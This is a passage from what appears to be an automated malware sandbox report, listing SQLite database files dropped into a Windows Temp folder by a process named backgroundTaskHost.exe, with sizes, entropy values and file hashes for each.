                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\JCGCUfWjUo

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\JIMIQunMQY

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\JLlBWR2z80

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\JSCZajAANF

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\KGInJy3ccP

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\KcKwHVk3CU

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Kv6fG6hdEm

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\LXhhdf7XBX

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Lew9CxVcVd

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\M8IiWlZHLU

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\MB3u1QHscs

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\MSRHan1uGj

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\MYTTT7wshY

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\MgWuwo6n90

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\MkxctjzYIB

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\MpFkbHfsN4

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\Mw5GN6wEqf

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\N3F3kBRsUq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\N7EgM5SkUg

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\NOzilj26I2

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\NT5MKSTefp

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\NpGPvtAEqQ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\O6napf1SVs

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
